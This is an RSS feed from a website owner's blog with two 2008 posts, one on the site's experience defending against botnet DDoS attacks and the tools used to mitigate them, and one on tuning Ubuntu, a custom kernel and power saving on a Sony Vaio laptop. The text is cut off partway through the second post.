<?xml version="1.0" encoding="UTF-8"?>

<rss version="2.0"
 xmlns:blogChannel="http://backend.userland.com/blogChannelModule"
>

<channel>
<title>About dslreports.com</title>
<link>http://www.dslreports.com/blog/site</link>
<description>Random site news information and ponderings, by Justin</description>
<language>en</language>
<pubDate>Thu, 24 Apr 2008 04:14:40 EDT</pubDate>
<lastBuildDate>Thu, 24 Apr 2008 04:14:40 EDT</lastBuildDate>

<image>
<title>dslreports.com</title>
<url>http://i.dslr.net/bbrdisc1.gif</url>
<link>http://www.dslreports.com</link>
<width>19</width>
<height>18</height>
<description>bbr disc</description>
</image>
<item>
<title>Experiences with DDOS mitigation - Part I - </title>
<description><![CDATA[<p>The last few weeks we have seen a number of distributed denial of service (ddos) aimed a dslreports.com. An attack would be from an hour to 48 hours. Over two weeks the attacker experimented with larger and different methods. <br> <br>nac.net kindly provided me with a graph that exhibit one attack from their perspective. <br> <br>At 13:00 the excess traffic started, over 600mbit more than normal. It continued and reached a peak of 1.1 gigabit over normal 7am the next morning, when it quickly ceased. <br> <br> att=1300592 <br> <br>From our perspective, the attack looked like this. The graph above is the high spike at the first thursday on this graph, reading from the right. <br> <br> att=1300593 <br> <br>The traffic rose at 13:00 on thursday until it quickly overwhelmed our port. When nac.net added two filters to block the traffic that was most easily identified as bad we regained some site function (the blue line is our traffic outbound). <br> <br>The next attack (the lump on the left of the graph above) started perhaps coincidentally almost at the same time and day of the subsequent week and lasted through to saturday afternoon although we'd figured out how to block it well before it finished. The original filters were re-applied, and what was left was the TCP traffic (web server requests on port 80) alone. Those were the ones we had to deal with. <br> <br>The ddos originated from a botnet. (<a href="http://en.wikipedia.org/wiki/Botnet">wikipedia definition</a>). The first botnet was fairly small and located largly in Russia. The second botnet was much larger and was mainly out of several south east asian countries, as well as Russia and Poland. In the end we heard garbage traffic from well over 65,000 IPs that would otherwise never have reason to visit our little corner of the world. <br> <br>What is a botnet? <br> <br>It is estimated that there are hundreds and maybe thousands of (overlapping) groups of compromised PCs ready to do the bidding of a C&C (command and control) machine, or machines. Most if not all participants in the botnet are home ISP subscribers who have no clue that their PC is moonlighting for another employer (although they may wonder why their connection is slow, or their pc appears busy). <br> <br>A botnet can be small or huge: 100,000+ machines with no theoretical upper limit. The more botnet members connected to the net via broadband rather than dial-up, the more effective the net. The faster and more recent the PCs, the more effective the net. The more widely geographically distributed, the more effective the net. <br> <br>A botnet will employ a number of techniques aimed at resource exhaustion of a web site. If the botnet can request more resources than the target can deliver, then (and actually before that point) legitimate users are impacted via slow-downs and errors, and in the end the site just appears "down" or so slow as to be unusable. <br> <br>Resources can be exhausted in several ways: <br> <br>immediate compute resources of the target can be exhausted by heavy traffic in fragmented packets. These packets require CPU for re-assembly and so in theory with enough of this traffic the CPU(s) will become too busy to attend to everything else and incoming traffic will be dropped. A badly designed firewall may also operate inefficiently under load and exhaust compute resources well before the incoming bandwidth reaches maximum levels. <br> <br>memory resources can be exhausted by filling up various kernel tables that are not tuned to be sufficiently large. <br> <br>page production capacity can be exhausted simply by requesting so many pages that most pages fail to be produced or fetched in a reasonable enough time. <br> <br>bandwidth capacity can be exhausted simply by sheer quantity of arriving packets. Nearly every site has a fixed maximum bandwidth budget (even as simple as the number of ports they have live, times their maximum port speed). When bandwidth capacity is used, there is little else the site can do. The site also faces the possibility of being charged onerously for the period of excessive incoming bandwidth - although one hopes that a web host only does this if the ddos attacks become a common pattern for the unfortunate client. <br> <br>Defenses <br> <br>In the linux/apache world there are a number of different defenses floating around that claim to mitigate DDOS attacks. Do they work? well, I had plenty of time to experiment with all of them. <br> <br>1. Web server anti-ddos modules (protect only against TCP attacks) <br> <br><a href="http://www.zdziarski.com/projects/mod_evasive/">mod_evasive</a>, <a href="http://dominia.org/djao/limitipconn.html">mod_limitipconn</a>, etc, are only effective against a single or handful of attacking IPs. Their limitations derive from their attempt to respond in SOME way (an error response, rather than ignoring the IPs), and lack of information these modules have on the current activity of an IP or its past activity. If you are expecting these modules to provide attack insurance then re-evaluate because even a small botnet of say 100 machines can easily succeed. One particular form of attack: "open and hold", is particularly difficult to counter by program-based ddos prevention. Admins struggle to identify open and hold attackers (<a href="http://www.webhostingtalk.com/showthread.php?t=666591">see topics like this</a>) due to the limitation apache has in reporting the IP of a new and as yet uncompleted request. <br>In the last week another apache module has come to my attention: <a href="http://mod-qos.sourceforge.net/">mod_qos</a>. It appears to be much more ambitious. In particular I like that it tries to give priority to IP addresses it has already seen. (VIPs). Unfortunately mod_qos appears to be very "alpha" with almost nobody using it in production yet. If it is debugged it will be the best apache module to use. <br> <br>2. A better web server <br> <br>Apache is honestly not very good at large numbers of simultaneous connections. Although it CAN be <a href="http://www.stdlib.net/~colmmacc/Apachecon-EU2005/scaling-apache-handout.pdf">driven to support 27,000 connections</a>, it is a very uncomfortable situation to be handling. Lighttpd is better, but is single process / single thread. At this point I suspect that the russian <a href="http://nginx.net/">nginx</a> webserver is the best: multiple processes, event driven - and is frugal with resources even with over 10,000 long lived connections. From the documentation I suspect it can easily break the 65k barrier. <br>By the way: you may wonder what is point of handling so many concurrent connections, or such a high request rate? the reason is that it is much easier to identify "bad IPs" if they are allowed at least for a short while to go all the way through to requesting a URL, which means getting handled by a resilient web server, and getting logged. After getting logged the logs are analyzed (hopefully in near real-time) and it is usually easier to identify which IPs need to be blocked further upstream. Which brings us to... <br> <br>3. Netfilter (firewall) DROP rules <br> <br>The netfilter firewall is extremely flexible - but is not fast enough at evaluating each individual packet (or even just each incoming SYN packet) against a long (1000+) list of DROP rules. It is necessary to use some netfilter extensions for the more difficult task of recognizing and dropping SYN packets against a large list of bad hosts. <br> <br>4. Netfilter (firewall) extensions <br> <br>There are only two extensions worth anything for ddos attacks: ipt_hashlimit (comes in netfilter and the 2.6 kernel) and <a href="http://ipset.netfilter.org/">ipset</a>. Hashlimit helps in identifying IPs that have risen to the level of fast consumers, and ipset handles block-lists of up to 65535 IP addresses that can be queried, loaded and unloaded from user-space. In addition, a carefully designed netfilter firewall setup will drop known bad packets as a priority, before they can be connection tracked, or traverse all the other rules. Typically netfilter firewall example scripts have a default of DROP (this is done at the end of the rule chain): your list of rules decides what is accepted. The implications are obvious: bad packets traverse the entire firewall stack before being dropped. In a ddos, bad packets are the majority of packets you receive, so you want to decide right at the start an origin IP address is no good, and move on. If your firewall is slow in processing all the packets incoming you will see drops recorded by the network card (see "6" below) under even a moderately sized attack. <br> <br>5. kernel tuning <br> <br>A number of kernel parameters should be increased or modified to help with extremely high request rates and tcp trouble. Generally where there is a maximum, it is increased. Where there is a timeout, it is decreased. Where there is a retry number, it is decreased! One frequent gotcha is the connlimit netfilter module. If you must use connlimit (by virtue of other rules in your firewall), and you think it will be tracking packets from the botnet at least bat the beginning before you have identified it, then make sure connlimit is loaded as a module with a high hashsize (eg 256000), and then tuned for a high maximum number of tracked connections! <a href="http://www.google.com/search?q=ip_conntrack+table+full&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a">See the pleas for help when this table hits the limit</a>. <br> <br>6. network card <br> <br>Your network card should be a quality one, with the most recent stable driver available. Unless your card driver has NAPI support, it will interrupt as often as once for every packet arrival. <br> <br>During a ddos, your interface may get a LOT of very small packets per second. If your ethernet card driver has bugs or is inefficient, it may start to drop the packets. If your kernel is not able to process the packets quickly, the card will also show packet drops - but it will not be the fault of the driver or the card, it is instead the fault of your netfilter firewall rules (see "3" above). <br> <br>Interrupts of 50k per second are still ok, but beyond that you may want to use the card in NAPI mode (often requires a driver recompilation and rmmod/insmod). <br>Consider that small packets over a 100mbit interface might arrive at a rate of 300k per second, or 3m per second for a gig-e! <br>For what it is worth our experience was with the Intel e1000 card, and the current driver appears to be fairly efficient and does not crash under load. I did find an Intel research paper boasting of the increases in performance and decreases in cpu used by each of their driver releases under linux 2.6 (but now I can't find it again). <br> <br>7. Active mitigation <br> <br>It is vital to know during an attack what the hell is going on! You need to be able to quickly identify from logs what the most frequently hit URL is, you need to sort the most frequently attacking IPs by descending order over a small time horizon, you need to be able to tcpdump, and you need to review the request headers for clues as to fingerprints. Using simple pipelines or scripts operating on data such as web server logs, or the active hashlimit table (which is reported in real time in /proc), you can then produce lists of IPs to supplement your blacklist, or obtain modify your server configuration to dump bad requests by picking up user-agent, headers, or other "tells". <br> <br>Note that the netstat command becomes worse than useless with large amounts of concurrent connections. Too slow to run, too cpu intensive. <br> <br>Are you prepared with some simple tools.. if your blacklist contains over 10,000 IPs, do you have some scripts ready to review if most are in a single class A or B space? or associated with a country? Do you have a database of class-B and class-C networks by country code ready? Using ipset to swap in a blocklist of networks that "turns off" entire countries can be a short-cut while you work out what else to do. Who knows, it might also give the attacker comfort that their attack is succeeding when in fact it is not. <br> <br>And most importantly of all, can you safely remotely access your network while the front-door is getting pounded down :) I heard that Disney land(s) are built with employee-only tunnels linking everything. For good reason. <br> <br>8. upstream filtering <br> <br>A data center can help by at least applying filters for UDP and ICMP (if they are a large, by size, component of the attack) and these will be applied upstream from your port. They may also be able to arrange with you other more advanced filters either by trouble ticket, or even an API. But don't expect much. Proper DDOS mitigation is a costly service they have no interest in providing for free. <br> <br>9. black boxes <br> <br>The big names sell hardware advertised as being ddos resistance. I've no experience with them and I have to wonder whether lab tests and white papers substitute for real attacks. There are also some inline devices appearing that can be placed outside your firewall. I am (again) suspicious that these can be real set-and-forget solutions. The ultimate botnet looks exactly like real users making real requests. Whether there are any ultimate botnets out there yet is a different issue, but that is the aim for all of them. As they approach this perfection, a black box might increasingly start to issue false positives. You are in the best position to spot what a botnet is doing vs the habits of your real users and that needs eyeballs on logs. <br> <br>The other problem for hardware solutions is that you need a port (to the black box) that is larger than the largest attack. If an attack is 1.2 gig-e and your expensive purchased port is 1 gig-e, then real traffic is getting blocked no matter how good your anti-ddos hardware. <br> <br>8. Distributed content networks, Proxy services, etc. <br> <br>The big guys handle ddos mitigation with distributed capacity. Multiple IPs for a single DNS lookup. Specialized proxy front-ends by akamai and others that are written with capacity and ddos-resistance in mind. This is too expensive a proposition for second or third tier sites. A less expensive solution is an on-demand proxy service: in the event of a DDOS, DNS lookups for your domain are switched or automatically switch to a larger proxy server that is able to handle the attack, pick apart the legit requests, pass them to you, and throw away the rest. A service such as ProxyShield can apparently be available on hot standby for a sub $1000 fee per month, and when turned on cost only a few times more than that. If however your ddos attack is going exceed 100mbit then the fees rise proportionally. <br> <br>9. Cutting off the botnet <br> <br>This would be the most satisfying, and we've done that before with the undercover help of friendly ISP network admins. The process is involved you can compare it to getting a trace on a phone call before the phone is hung up. I think you have to assume that tracking down the command and control mechanism and taking it out is a pretty rare occurrence so if it is more like a lottery ticket than a solution to anything. <br> <br>10. Reporting the botnet <br> <br>If you have your wits about you there is one log that you need to keep or produce, and that is an accurately timestamped log of participating IPs. It can be as simple as UTC Time and IP address. It is important to try to keep false positives out, so the list should be combed for any prior-to-attack users of the website. There is undoubtedly a correct place, or places, to report such a list but right now I don't have that info handy. Perhaps someone in the comments can expand this point. Some ISPs will act on lists like these, but most will not. Expect absolutely no cooperation from ISPs based in most overseas countries but applaud any cooperation that does happen. <br> <br>Final Thoughts <br> <br>Our data-center believes that the best way to mitigate a DDOS attack is to "not piss people off". If you can be online and arrange your affairs so that you never piss anyone off then good luck to you. Unfortunately, however, botnets are getting cheap enough to build or rent that they will be deployed more frequently, and in retaliation for ever small disagreements. Supposedly also gangs will extort money to stop an attack. If you are in the online gambling business that might be the biggest risk. <br> <br>In my view the best defense is to simply be a harder target than average. Spending some time to make sure that a small attack has no effect will probably discourage bigger efforts and save you from running into the arms of an anti-ddos vendor the moment one person tries a few things to tie up your site! As a side-effect it will also probably make the site faster and more able to handle non-ddos "slashdot effects" as well. <br> <br>I'll update this article further if I can, and do a second one with more technical details that we have found effective.<br><a href="http://www.dslreports.com/shownews/Experiences-with-DDOS-mitigation-Part-I-93853">read comment(s)</a></p><br clear=all>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/shownews/Experiences-with-DDOS-mitigation-Part-I-93853</guid>
<pubDate>Thu, 24 Apr 2008 04:14:40 EDT</pubDate>
</item>
<item>
<title>Ubuntu Gutsy on Sony TX series (TXN19P) - custom kernel, powertop optimized and all</title>
<description><![CDATA[<p>Help! I lost a week of my productive hours to Ubuntu. First it starts with downloading LiveCD and booting it, then it becomes "I'll just try it in a partition" and finally you are chasing down minor tweak after minor tweak to get it almost, but never perfectly, "just right". <br> <br><div class="wiki"><h3>lspci, lsusb</h3></div> <br><div class="code"><pre><span class="codetext"> 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 02:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02) 06:04.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller 06:04.1 FireWire (IEEE 1394): Texas Instruments PCIxx12 OHCI Compliant IEEE 1394 Host Controller 06:04.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD) 06:08.0 Ethernet controller: Intel Corporation PRO/100 VM Network Connection (rev 02) Bus 005 Device 001: ID 0000:0000   Bus 004 Device 008: ID 044e:300c Alps Electric Co., Ltd  Bus 004 Device 001: ID 0000:0000   Bus 003 Device 008: ID 0483:2016 SGS Thomson Microelectronics Fingerprint Reader Bus 003 Device 001: ID 0000:0000   Bus 002 Device 001: ID 0000:0000   Bus 001 Device 001: ID 0000:0000   </span></pre></div> <br><div class="wiki"><h3>What works etc..</h3></div> <br><b>What works out of the box</b> <br><small>Gutsy, actually, not Feisty, although Feisty was ok too</small> <br><blockquote>The HDD and DVD drive, of course <br>The video-subsystem including 24 bit deep native 1366x768 (use the intel driver but i810 works as well) <br>Wifi (ipw3945) and wpa_supplicant via gnome NetworkManager <br>Bluetooth <br>Sound (speakers and headphones) <br>Suspend to disk <br>Suspend to RAM <br>Texas 5-in-1 card reader (Gutsy also provides sony memory stick filesystem) <br>Screen brightness <br>PMCIA cards (probably?) <br>USB port <br>Playing DVDs (using VLC) <br>3d graphics (glxgears 525fps, compiz etc) <br></blockquote> <br> <br><b>What can easily be made to work</b> <br><blockquote>Reasonable sony keys support <br><small>rmmod sonypi; modprobe sony_laptop .. edit the hotkeys startup script to avoid sonypi and use sony_laptop instead</small> <br>fan control via command line <br><small>again, provided by sony_laptop. The fan appears to be controlled by thermals so there is little point changing the speed manually</small> <br>Full synaptics/ALPs pad <br><small>requires some xorg.conf tweaking to enable synclient and/or to setup options to disable double-tap and so on</small> <br><small>you should have absolutely smooth motion, no halts or jumps</small> <br>Brightness control <br><small>the acpi brightness .sh script called by down/up brightness keys interprets brightness level 0 as "off" but there is no "off" utility (spicctrl), and brightness level 0 is actually available so we miss out on minimum brightness without echo 0 into the /proc file. This is also a filed bug in launchpad.</small> <br>56k intel_hda modem <br><small>I guess? haven't tried it</small> <br></blockquote> <br> <br><b>Not enabled</b> <br><blockquote> <br>Alt-Fn F10 - resolution expansion key <br><small>in addition, the AV keys apart from the green one, and the eject, do not generate events</small> <br></blockquote> <br> <br><b>Not ideal</b> <br><blockquote>An unlabeled Fn-F2 is connected to gnome volume mute and un-mute <br>the mute button works but does not generate any software events <br>the volume up/down buttons do not alert any software <br>the brightness up and down change isn't communicated to gnome brightness applet (which works, but gets confused as to the current brightness) <br>There is a TPM module for the TPM Infineon chip, but little docs for it <br>The brightness setting on this laptop is actually NINE steps (0 thru 8 inclusive). The sony_laptop module thinks hardware starts from 1, so it maps that to 0. The brightness modification hotkey script takes this mistake and compounds it, by mapping 0 to "off" (which is not possible on this vaio). By fixing both of these issues we regain all 9 levels of brightness and are able to use the two lowest settings that were previously blocked under default Ubuntu. <br></blockquote> <br> <br><b>What doesn't work</b> <br><blockquote>Fingerprint reader <br><small>The <i>thinkfinger</i> project explicitly says it is not for the vaio reader, it gives a CONNECT error</small> <br>Sprint EVDO WWAN <br><small>you can get it up as a usbserial device, but so far I haven't figured out how to use it</small> <br></blockquote> <br> <br><b>What works better than windows XP</b> <br><blockquote>The wifi association/dhcp lease renewal (was kind of flaky under XP) <br>suspend/resume (XP would disable the hibernate option after one use!) <br></blockquote> <br> <br><b>What doesn't work as well as XP</b> <br><blockquote>Power usage is 15% higher at full idle than XP. <br><small>still investigating this, some hardware must be left on by linux</small> <br>Kernel loses touch with disk, and file-system goes read-only after suspend/resume(?) <br><small>I noticed this on Gutsy, with my current config haven't seen it</small> <br>Turning off power to CDROM kills access to HDD <br><small>hald recognizes when the CDROM goes off and appears to screw up access to the HDD</small>  <br></blockquote> <br> <br><div class="wiki"><h3>NetworkManager</h3></div> <br>The stated aim of NetworkManager is to make networking "just work". It doesn't yet achieve this. I have noticed several issues. NetworkManager will sometimes SEGV and then enter an infinite cpu-using loop handing the signal. It has to be killed with -9 then restarted. The gnome nm-applet does not recognize when NetworkManager has gone beserk. Sometimes (through hibernate/resume or whatever) it gives up and wireless networking must be unchecked then re-checked before it wakes up, and finds the AP. The safest thing to do is to add to /etc/acpid/resume.d a script that will simply kill NetworkManager, and wpa_supplicant, then restart it fresh. The same thing needs to be done after hibernate (to disk) resumes. <br> <br><div class="wiki"><h3>More on power management and power drain</h3></div> <br>Out of the box ubuntu doesn't offer many options for maximum battery life. hdparm is not set to enable power saving on the HDD. Even the screen blank option (turning off the panel) minimum setting is a long 10 minutes (you can use xset dpms to specify seconds if you want a shorter timeout). There is no GUI support for turning off bluetooth, setting wifi power saving, or disabling polling the CDROM drive. <br>I used the following links to get familiar with power saving: <br>&raquo;<A HREF="http://www.thinkwiki.org/wiki/How_to_reduce_power_consumption " >www.thinkwiki.org/wiki/How_to_re&middot;&middot;&middot;umption </A><br> <br><div class="wiki"><h3>Basic Tweaking</h3></div> <br>I played with the following for speed: <br>preload <br>readahead (including requesting a re-profile) <br>prelink <br>bootchart <br>In summary, preload is a daemon that attempts to do read-ahead for applications to improve startup time. readahead comes with Ubuntu but you can tune it (look at /etc/readahead/files, and reboot with 'profile' in the kernel command line to generate a new file list). Use bootchart to generate a PNG of your current boot that you can view with firefox to see if your last fix improved boot time or not. Prelink can be manually run, or run on all executables in the major directories, to improve their startup time. You can manually run it against firefox by prelinking firefox-bin but you will have to tell prelink where the firefox libraries are (they are in the same directory as firefox-bin). <br> <br><div class="wiki"><h3>Building a Custom Kernel on Gutsy</h3></div> <br>I decided to build a custom kernel. It provides more flexibility for this hardware. There were at least two kernel patches I was interested in. One allowed under-volting which possibly allows better power consumption, and the other is known as HPET, (High Precision Event Timing) supposedly provides better CPU idling. <br>A third patch was to implement the "completely fair scheduling" which is just a Cool Thing if you want to do background compilations while still getting a responsive desktop. In addition I wanted to fix the errors I was having with the HDD that resulted from coming back from a suspend (or perhaps power-saving options). The ubuntu bug database appeared to indicate this may have been fixed in a kernel version beyond Gutsy. <br> <br>So I built a custom kernel starting with 2.6.22-14 with: <br>linux-phc-0.3.0 patch (patches acpi-cpufreq to allow undervolt) <br>patch-2.6.22-hrt6 patch (patches for better cpu idling) <br>sched-cfs-v2.6.22.9-v22 patch (patches for completely fair scheduling) <br>tuxonice patch (faster suspend to disk) <br> <br>HPET is activated according to the new boot log: <br><div class="code"><pre><span class="codetext"> &#91;   17.498633&#93; hpet clockevent registered &#91;   17.498641&#93; hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0 &#91;   17.498647&#93; hpet0: 3 64-bit timers, 14318180 Hz </span></pre></div> <br>linux-phc is active if you have  <br><div class="code"><pre><span class="codetext"> /sys/devices/system/cpu/cpu0/cpufreq/phc_default_vids /sys/devices/system/cpu/cpu0/cpufreq/phc_vids </span></pre></div> <br>The only 'restricted driver' used by this laptop is ipw3945, and although there are instructions on how to compile it up, <i>you need to get the ubuntu modified version</i> because it fixes bugs in the 'upstream' version that, at least for this hardware, break NetworkManager / wpa_supplicant! I wasted a day fiddling around with wpa_supplicant and NetworkManager before figuring this out. The key breakthrough was a post ( &raquo;<small>https</small>://<A HREF="https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/128360/comments/10">bugs.launchpad.net/ubuntu/+sourc&middot;&middot;&middot;ments/10</A> ) explaining how to test wpa_supplicant with wpa_cli, and seeing that it didn't actually command the wifi device properly. <br> <br>I used the kernel build instructions in this topic, (post #2, not #1) <br> <br>&raquo;<A HREF="http://ubuntuforums.org/showthread.php?t=538068 " >ubuntuforums.org/showthread.php?t=538068 </A><br> <br>Since I wanted to apply multiple patch files, not just 1, there was more work to manually handle the .rej files. While the kernel was building I had to obtain the three different source files for the ipw3945 (daemon, driver and ucode) following roughly this explanation: <br>&raquo;<A HREF="http://ubuntuforums.org/showthread.php?t=294842 " >ubuntuforums.org/showthread.php?t=294842 </A><br>(if make fails with lots of errors try make shell=/bin/bash !) <br> <br>I did need to grab the current ubuntu patched version of ipw3945.c first, however, which the above link does not mention. There is a reason that modinfo reports ipw3945 in vanilla gutsy or Feisty is "1.2.2d.ubuntu1" not "1.2.2d". The reason, and patch, is here: <br>&raquo;<A HREF="http://www.nabble.com/-PATCH--normalize-ipw3945-association-behaviour-t4401744.html " >www.nabble.com/-PATCH--normalize&middot;&middot;&middot;44.html </A><br>The ubuntu file is out there in ubuntu source repository land, and I can't find it right now. <br> <br>The .config file was based from the one provided in the forum howto above. I wanted to make sure powertop would work so I had to enable CONFIG_DEBUG_KERNEL. <br> <br>After bootup I added the 'ladder' kernel module to install by adding it to /etc/modules. 'menu' seemed buggy, it would lose track of the availability of the processor C3 state after the AC adapter went in then was removed again. <br> <br><div class="wiki"><h3>Using powertop and maximising battery life</h3></div> <br>In order to maximise battery life so that it would approach or match XP I had several aims: <br>* maximum power saving CPU state <br>* minimum number of interrupts per second <br>* maximum power saving state (or off state) for devices <br>* minimum disk activity <br>The following little collection of commands addresses this: <br><div class="code"><pre><span class="codetext"> echo 1500 &gt; /proc/sys/vm/dirty_writeback_centisecs iwpriv eth1 set_power 2 hciconfig hci0 down &amp;&amp; rmmod hci_usb echo 5 &gt; /proc/sys/vm/laptop_mode echo performance &gt; /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor echo 1500 &gt; /proc/sys/vm/dirty_writeback_centisecs echo 3 &gt; /sys/class/backlight/sony/brightness # ethtool -s eth0 wol d # hdparm -B 1 -S 35 /dev/sda echo 0 &gt; /sys/devices/platform/sony-laptop/bluetoothpower #echo 0 &gt; /sys/devices/platform/sony-laptop/cdpower echo 0 &gt; /sys/devices/platform/sony-laptop/fanspeed hal-disable-polling --device /dev/scd0 xset s 120 120 </span></pre></div>Most of this is self-explanatory. I had to comment out powering down the cd drive because that seemed to destroy access to the HDD (they share the same IRQ). <br> <br>What you can't see elsewhere is that I also mount the drive using options 'noatime', and 'commit=30' as ext3 appears to want to write to the drive every 5 seconds if there is the slightest activity and this plays havoc with HDD sleep. You will also have to deal with syslogd wanting to write to a bunch of log files all the time if you want the drive to really spin down. <br> <br>using powertop I also saw what had been reported by others: that X with 3d enabled seemed to generate an interrupt 60 times a second. So I edited xorg.conf and added Option "NoDRI" to the Device section for the chip. I also switched to the "intel" driver from the "i810" driver for no good reason I can yet find, other than the "intel" driver appears to be newer. Without DoDRI, glxgears and compiz (ubuntu "desktop special effects") worked ok. <br> <br>Powertop also revealed that interrupts per second are jacked up by your AP wifi beacon frequency (which often defaults to 10 times a second - change it @ your router), and use of the ALPs/Synaptic pad which generates 80 packets a second when you are touching the pad. Firefox contributes at least 10 a second, and some of the more continuous gnome widgets also generate some. <br> <br>Only by running in text mode with no graphical desktop could I make powertop go green and show a mere 5 interrupts per second. <br> <br>Gutsy tickless kernel helps vs Feisty (the previous production ubuntu), and the HPET patch, and the phc patch, both appear to help some more (now I wish I'd kept stats at each stage). <br> <br><div class="wiki"><h3>Boot and shutdown time</h3></div><table align=left cellpadding=20><tr><td><div class="soft-tbl"><table cellspacing=1><tr><td>Mark</td><td>XP</td><td>Ubuntu 7.10</td></tr><tr><td>+9s</td><td>Grub menu</td><td>Grub menu</td></tr><tr><td>+14s</td><td>Splash</td><td>Splash</td></tr><tr><td>+29s</td><td>Cursor</td><td>Moving bar</td></tr><tr><td>+39s</td><td>Welcome</td><td>---</td></tr><tr><td>+44s</td><td>--</td><td>Cursor</td></tr><tr><td>+49s</td><td>XP Sound</td><td>--</td></tr><tr><td>+54s</td><td>---</td><td>login box</td></tr><tr><td>+59s</td><td>desktop</td><td>sound</td></tr><tr><td>+1m 9s</td><td>start firefox</td><td>--</td></tr><tr><td>+1m 14s</td><td>--</td><td>desktop</td></tr><tr><td>+1m 19s</td><td>--</td><td>start firefox</td></tr><tr><td>+1m 24s</td><td>--</td><td>firefox ready</td></tr><tr><td>+1m 55s</td><td>firefox ready</td><td>--</td></tr><tr><td>+15s</td><td>shutdown</td><td>shutdown</td></tr></table></div></table>At first I thought that Ubuntu was much slower than windows on booting up but impressions can be deceiving. Windows does a good job of <i>showing</i> you your desktop as fast as it can but you can't actually <i>use</i> it for a fair bit longer, and launching firefox asap incurs a huge delay, evidently because certain services are still being started up in the background. <br> <br>This XP install is fairly vanilla. No AV software or anything expensive put into auto-startup. Most of the stuff Sony threw in was removed or disabled. <br> <br>Ubuntu is up and multi-user earlier than XP, at about the 25 second mark after grub kicks it off, but takes longer to give you a fully functional desktop. Once the desktop appears, however, the machine is pretty much devoted to your needs so it is able to start firefox in just 5 seconds or so. <br> <br>In both XP and Ubuntu, the wifi network is up and available before you are able to use it. <br><br><br><br><br> <br><div class="wiki"><h3>Baselining Windows XP consumption</h3></div> <br>Analyzing XP power consumption was useful so I could aim Ubuntu at the same target. On an idle XP desktop, with maximum power saving and minimum brightness, XP allows the processor to stay in C3 over 98% of the time. With wifi off, XP is handling about 60 interrupts per second, and changes state out of C3 about 60 times per second. With movement on the touchpad, C0 rises to about 5% and C3 drops, while interrupts and context switches shoot up, but power usage does not rise that much. <br> <br>Monitoring the reported battery draw under XP (leaving it 5 minutes to stablize): <br>1600mw - suspended <br>3400mw - screen off (maximum battery settings) <br>5250mw - backlight level 0 <br>5350mw - enable CD drive <br>5380mw - enable modem <br>5420mw - enable audio <br>6240mw - enable wifi, on power saving mode <br>6300mw - wifi on standard mode <br>9050mw - backlight level 7 <br>5000mw - lcd panel off (everything else on) <br>+300mw - constant touchpad use (5% busy cpu) <br> <br>Conclusion: <br>Although the touchpad generates a lot of interrupts, under XP this does not translate to much increased CPU usage, or much increased power usage. <br> <br>Under Ubuntu, moving the mouse using the touchpad took over 10% of the CPU, depending on what application is under the mouse. Firefox, for instance, the CPU is busy - albeit at 800mhz - 10% of the time. Removing the "ondemand" power manager helps increase C3 state usage: the cpu is able to spend more time at C3 during mouse movement than it could at 800mhz, and power usage actually dropped. <br> <br>This article &raquo;<A HREF="http://softwarecommunity.intel.com/articles/eng/1086.htm" >softwarecommunity.intel.com/arti&middot;&middot;&middot;1086.htm</A> is a good one on how C3 power benefits getting destroyed by frequent interrupts. <br> <br><div class="wiki"><h3>Frequency scaling / under-volt</h3></div> <br>Frequency scaling was there from Feisty and Gutsy anyway, although on this laptop the only options offered by ACPI are full speed (1.2ghz) or 800mhz (same as XP). I don't think frequency scaling is very useful on this platform. If you have work to do, do it as quickly as possible so you can go back to C3 state. <br> <br>One can also attempt to lower the voltage to save power and heat, but supposedly this intel chip locks the minimum voltage at barely below the default at 800mhz, at 0.930v or something like that. Running at 1.2ghz and a lower voltage would be useful, however. I haven't found a way to determine whether the requested voltage is actually in use. <br> <br><div class="wiki"><h3>Power Results</h3></div> <br><b>Best results</b> <br>In text mode, with a custom kernel, with a couple of daemons killed and without running X I can get the average time in C3 state to over 200ms (less than 5 interrupts per second) while still being on wifi. At this point the entire laptop is using about 6 watts of power even though the LCD backlight is active. With about 50 watts of battery capacity the runtime in this mode would be theoretically over 7 hours. <br> <br>As this article points out, allowing C3 to actually save power requires 1ms+ residency: &raquo;<A HREF="http://softwarecommunity.intel.com/articles/eng/1086.htm " >softwarecommunity.intel.com/arti&middot;&middot;&middot;086.htm </A><br> <br>Running on desktop, with mouse and pointer use, on brightness setting 3 from 0..7, power use is around 7.5 watts. This is not quite as good as XP. <br> <br>Critically, I was unable to achieve the same minimum power consumption as XP (wifi off, devices off). XP gets down below 5 watts here. Ubuntu cannot get below 6 watts. Ubuntu must be leaving a key device on, or not in a low power state. <br> <br><b>Typical Results</b> <br>Once you have identified with powertop the problem drivers and mitigated them as you can, once you have disabled bluetooth, reduced wifi consumption, turned off cdrom polling and set HDD power saving, and decreased the need for linux to write to the drive 